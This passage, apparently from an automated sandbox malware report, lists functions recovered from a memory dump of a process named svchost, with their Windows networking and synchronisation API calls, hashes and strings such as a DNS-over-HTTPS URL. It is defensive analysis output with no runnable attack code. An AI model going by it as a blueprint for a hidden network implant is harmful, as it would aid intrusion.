                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05B6BA4B,?,00000000,?,00000000,00000000,?,00000000), ref: 05B6AE22
                                                                                    • closesocket.WS2_32(00000000), ref: 05B6AE5D
                                                                                    • memset.MSVCRT ref: 05B6AE73
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 05B6AED4
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEE1
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEEB
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEF3
                                                                                    • closesocket.WS2_32(?), ref: 05B6AF17
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 05B6AF25
                                                                                    • RegisterWaitForSingleObject.KERNEL32(00000154,?,05B6AF9E,00000000,000000FF,00000004), ref: 05B6AF62
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1241441197-0
                                                                                    • Opcode ID: 242b00ea21b77a01bf79e1d80d66ea3c4327560e5961bb2fce2a0c367bfeeeaa
                                                                                    • Instruction ID: 4e9f35b8b7b86a30dbf954c39e5dc6c406ba2adc3a0db6bd50df0690b2df58b5
                                                                                    • Opcode Fuzzy Hash: 242b00ea21b77a01bf79e1d80d66ea3c4327560e5961bb2fce2a0c367bfeeeaa
                                                                                    • Instruction Fuzzy Hash: AA51B176210A02EFDB259F60CC49BBABBB9FF04311F204669F556D6190DB78F901CB90
                                                                                    Function 05B642EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 166stringnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsstrlen$callocinet_addrmemset
                                                                                    • String ID: https://cloudflare-dns.com/dns-query
                                                                                    • API String ID: 1536131324-770057447
                                                                                    • Opcode ID: 3e859fc5c61f0875a012523c0cb8bfc8339db1b179cc2237dd456e498456937c
                                                                                    • Instruction ID: 7dbd29933be24193bc3730e14bea65c713ef4e99a09e755eba39f8317d9db1bb
                                                                                    • Opcode Fuzzy Hash: 3e859fc5c61f0875a012523c0cb8bfc8339db1b179cc2237dd456e498456937c
                                                                                    • Instruction Fuzzy Hash: A3513E76601B09ABDB10EF64CC8AFEBB7ADFF04310F004559E95A96140EB78F554CB91
                                                                                    Function 05B6A964 Relevance: 12.2, APIs: 8, Instructions: 170networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • shutdown.WS2_32(?,00000001), ref: 05B6A9E0
                                                                                    • WSAGetLastError.WS2_32(?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000,00000000,?,00000000), ref: 05B6A9F1
                                                                                    • closesocket.WS2_32(?), ref: 05B6AA67
                                                                                    • UnregisterWait.KERNEL32(?), ref: 05B6AAAC
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000), ref: 05B6AAC6
                                                                                    • free.MSVCRT ref: 05B6AAEC
                                                                                    • UnregisterWait.KERNEL32(?), ref: 05B6AB0D
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000), ref: 05B6AB1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3261266694-0
                                                                                    • Opcode ID: a0b2208e854cd2af1cc5de94dd086fa26b7ab4bc693a6827bf640c3d82ed90a9
                                                                                    • Instruction ID: 9641b079cde43f13f03ac08c690f7bd313f9aba4b530a401c4cff903f80038fa
                                                                                    • Opcode Fuzzy Hash: a0b2208e854cd2af1cc5de94dd086fa26b7ab4bc693a6827bf640c3d82ed90a9
                                                                                    • Instruction Fuzzy Hash: D4514335208B01CFDB25CF69C584A26B7F6FF04324B144AAEE997A76A0C738F845CB50
                                                                                    Function 05B6CE0A Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$memset
                                                                                    • String ID:
                                                                                    • API String ID: 4054172246-0
                                                                                    • Opcode ID: cb4bad929ee0b832528ff5b95581577fc35e6eef0e53ff995664734151d1b71f
                                                                                    • Instruction ID: 009495ed13db8049d03f9304ecd8d6dd7a53011d057691dacfe78b575bba4afa
                                                                                    • Opcode Fuzzy Hash: cb4bad929ee0b832528ff5b95581577fc35e6eef0e53ff995664734151d1b71f
                                                                                    • Instruction Fuzzy Hash: 91516C76540A09AFD721DF65C849BAABFF9FF04314F108969E187DA180D778FA09CB90
                                                                                    Function 05B6C391 Relevance: 10.6, APIs: 7, Instructions: 83networksynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,05B6CC99,?,000000FF,00000000,00000000), ref: 05B6C3B8
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,05B6CC99), ref: 05B6C3F9
                                                                                    • GetLastError.KERNEL32(?,?,?,05B6CC99), ref: 05B6C404
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,05B6CC99), ref: 05B6C40D
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,05B6CC99), ref: 05B6C414
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,05B6CC99), ref: 05B6C423
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,05B6CC99), ref: 05B6C446
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1659421480-0
                                                                                    • Opcode ID: 4a54b258e8af3748a47592a17717d3081368112c44e7a4bf25b2620c6a860e91
                                                                                    • Instruction ID: c2ea334d3e5ba3f8f2db1cbb1e99f78af8d72d1ce84218e21ba7f05b72680fbd
                                                                                    • Opcode Fuzzy Hash: 4a54b258e8af3748a47592a17717d3081368112c44e7a4bf25b2620c6a860e91
                                                                                    • Instruction Fuzzy Hash: FE21D732540110ABD7219E249C4DEBF7E6AFB44770F141755FD66E71C0CA38BC40C6A1
                                                                                    Function 05B65DC5 Relevance: 8.8, APIs: 7, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86EC0,0000000C), ref: 05B65DFF
                                                                                    • memcmp.MSVCRT(?,05B86EB0,0000000C), ref: 05B65E21
                                                                                    • memcmp.MSVCRT(?,05B86EA0,0000000C), ref: 05B65E43
                                                                                    • memcmp.MSVCRT(?,05B86E80,0000000C), ref: 05B65E83
                                                                                    • memcmp.MSVCRT(?,05B86E70,0000000C), ref: 05B65EA5
                                                                                    • memcmp.MSVCRT(?,05B86E60,0000000C), ref: 05B65EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    • Opcode ID: 93bfc4ffb71309c6abf4dc0f9336ff7eb6157df5d016b1436b172c8d89f5ee55
                                                                                    • Instruction ID: dd92c79f9022aac274396835e52e6935fdeffaf60a8760833b5d4386fba9a475
                                                                                    • Opcode Fuzzy Hash: 93bfc4ffb71309c6abf4dc0f9336ff7eb6157df5d016b1436b172c8d89f5ee55
                                                                                    • Instruction Fuzzy Hash: B6119D72F85210A1EB303FACAF46F7B3746AB30549F8421E0ED06E4296F149F219C146
                                                                                    Function 05B63D1A Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 377COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp$callocfree
                                                                                    • String ID: factfmt RIFFdata
                                                                                    • API String ID: 254810267-2461439165
                                                                                    • Opcode ID: c79d2b419a4d4121d3957ba56e560eee771ceb81c666471f8f5d7d7963ef60a0
                                                                                    • Instruction ID: 4b5d3edcc03a001b619bdd4b4f32b4204eac17acda9e897dcff986d521ec066c
                                                                                    • Opcode Fuzzy Hash: c79d2b419a4d4121d3957ba56e560eee771ceb81c666471f8f5d7d7963ef60a0
                                                                                    • Instruction Fuzzy Hash: 3DD1B072E046199BDF24DBA4C884BEEB7F9EF45700F1484AAE515E7140E738FA44CB64
                                                                                    Function 05B736FD Relevance: 7.8, APIs: 6, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$calloc
                                                                                    • String ID:
                                                                                    • API String ID: 1504270956-0
                                                                                    • Opcode ID: d7faa4fb2babeb0d080fa12578a5b5b1bf5303a66d06e8871728fe9ab609f76d
                                                                                    • Instruction ID: cb256214ff50ae02a0fa8302c809b3a936c3f76af785fa8510812055b394cda5
                                                                                    • Opcode Fuzzy Hash: d7faa4fb2babeb0d080fa12578a5b5b1bf5303a66d06e8871728fe9ab609f76d
                                                                                    • Instruction Fuzzy Hash: 26C12E72A0060DABDB11DEA4CD85EEF77FDFB44240F1449AAE526E7140F630FA059BA1
                                                                                    Function 05B6A6A3 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: strchr$memset
                                                                                    • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                    • API String ID: 3020236661-885041942
                                                                                    • Opcode ID: ac8872fa950b003b1229eb147d8be935256dc29df5f5d20247b4bf28b31afa82
                                                                                    • Instruction ID: 5d867a508df76535b1e58ef46a38c992921118fe7997630caf7d5eebf9aba39d
                                                                                    • Opcode Fuzzy Hash: ac8872fa950b003b1229eb147d8be935256dc29df5f5d20247b4bf28b31afa82
                                                                                    • Instruction Fuzzy Hash: 4E51903590424ADFCF15CF98C8849FEBFB6FF85255F1041AAD442B7241D734AA85CB92
                                                                                    Function 05B69C8E Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69C9B
                                                                                    • InterlockedCompareExchange.KERNEL32(05B6CC90,00000000,00000000), ref: 05B69CAD
                                                                                    • SetEvent.KERNEL32(00000000,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CBE
                                                                                    • CloseHandle.KERNEL32(00000000,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CCA
                                                                                    • WaitForSingleObject.KERNEL32(05B6CC8C,000000FF,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 4206309166-0
                                                                                    • Opcode ID: 783287b088f3d76a576ff2488e6ccc6904b0a1251e6db1447dfc9f14634a8484
                                                                                    • Instruction ID: a3959964207965682bc01008ea4142088331cdb3e36d69d81e0854f0f4111387
                                                                                    • Opcode Fuzzy Hash: 783287b088f3d76a576ff2488e6ccc6904b0a1251e6db1447dfc9f14634a8484
                                                                                    • Instruction Fuzzy Hash: EDF08235154304BBDB102FA0DC4EFA5BFADEB047A1F105411FA1B9A1C0DA71B440CB64
                                                                                    Function 05B65F37 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86E30,0000000E), ref: 05B65F62
                                                                                    • memcmp.MSVCRT(?,05B86E20,0000000E), ref: 05B65F84
                                                                                    • memcmp.MSVCRT(?,05B86E10,0000000E), ref: 05B65FA6
                                                                                    • memcmp.MSVCRT(?,05B86E00,0000000E), ref: 05B65FC8
                                                                                    • memcmp.MSVCRT(?,05B86DF0,0000000E), ref: 05B65FEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    • Opcode ID: 3cbc30de58b6c387eb2d4d5e747079374f156c9897f35fdda8b64feedefcfe23
                                                                                    • Instruction ID: 2b8cb902d17cd109a5b0641ad5f08519e7ae4c3b3c44db5e4d736c41dac8b59f
                                                                                    • Opcode Fuzzy Hash: 3cbc30de58b6c387eb2d4d5e747079374f156c9897f35fdda8b64feedefcfe23
                                                                                    • Instruction Fuzzy Hash: 270171B2B9474661E7303F6C9F06F3A2346F730585F8424D0FD05E8281F59AF259C102
                                                                                    Function 05B66004 Relevance: 6.3, APIs: 5, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86DE0,0000000F), ref: 05B66025
                                                                                    • memcmp.MSVCRT(?,05B86DD0,0000000F), ref: 05B66043
                                                                                    • memcmp.MSVCRT(?,05B86DC0,0000000F), ref: 05B66065
                                                                                    • memcmp.MSVCRT(?,05B86DB0,0000000F), ref: 05B66087
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    • Opcode ID: 9fb770b4e201816a92d3841c2019fa870315badcd4d09ca8a9da83c3a4e2f46a
                                                                                    • Instruction ID: 2a717afe816ebc38c4788233f87b2e90dc7c1092b28b3dae89adef124cf53234
                                                                                    • Opcode Fuzzy Hash: 9fb770b4e201816a92d3841c2019fa870315badcd4d09ca8a9da83c3a4e2f46a
                                                                                    • Instruction Fuzzy Hash: EE01AD62B8562262D7203E2C1E87F7E3395AB30694F4430F1FD05E564AF249F609D29A
                                                                                    Function 05B641F6 Relevance: 6.1, APIs: 4, Instructions: 88networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 05B64236
                                                                                    • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 05B64259
                                                                                    • htons.WS2_32(00000006), ref: 05B642BE
                                                                                    • FreeAddrInfoW.WS2_32(00000000), ref: 05B642D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                    • String ID:
                                                                                    • API String ID: 928751204-0
                                                                                    • Opcode ID: fff0fd9b7cb120672a85e668f6dfb7ca7cb067461fc3982cddec7bfdaaa9d028
                                                                                    • Instruction ID: a9ecf8890fe5c984853723e9a7e6ba062aaddf1a15226c5f3315e0cabc93ecf7
                                                                                    • Opcode Fuzzy Hash: fff0fd9b7cb120672a85e668f6dfb7ca7cb067461fc3982cddec7bfdaaa9d028
                                                                                    • Instruction Fuzzy Hash: 95319F75A10609AFCF24DF98C888AEEBBBAFF48314F244499E401D7211D374F995CBA0
                                                                                    Function 05B6B62C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 05B6B732
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6B7E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastRecv
                                                                                    • String ID: E'
                                                                                    • API String ID: 904507345-3751625834
                                                                                    • Opcode ID: e85513ec176c27134cd37bebb4bc93c8f6a36919a65c79554143ae3e7499115d
                                                                                    • Instruction ID: 143e6c3541cf44e5d8810eb13d65d3758867c4b70825c0ab84466aec057b656c
                                                                                    • Opcode Fuzzy Hash: e85513ec176c27134cd37bebb4bc93c8f6a36919a65c79554143ae3e7499115d
                                                                                    • Instruction Fuzzy Hash: 3881C271504708AFDB348F14C884EBAB7B9FF04364F0046AEE996C6591E739FA468B91
                                                                                    Function 05B6F06E Relevance: 5.1, APIs: 4, Instructions: 54stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: strlen$callocfree
                                                                                    • String ID:
                                                                                    • API String ID: 3898528724-0
                                                                                    • Opcode ID: 5e134de63ce87143c0ce6f08789dcaef4f21aa39f9064c10556045220749b912
                                                                                    • Instruction ID: 0230cfa745999911ea9fe7aeeb024fefa56a17e190bad95293d39c56630bea20
                                                                                    • Opcode Fuzzy Hash: 5e134de63ce87143c0ce6f08789dcaef4f21aa39f9064c10556045220749b912
                                                                                    • Instruction Fuzzy Hash: D60140716087019FEB209F79AC85B77779FFF44255F0048AAF61AC2145DB35B500C662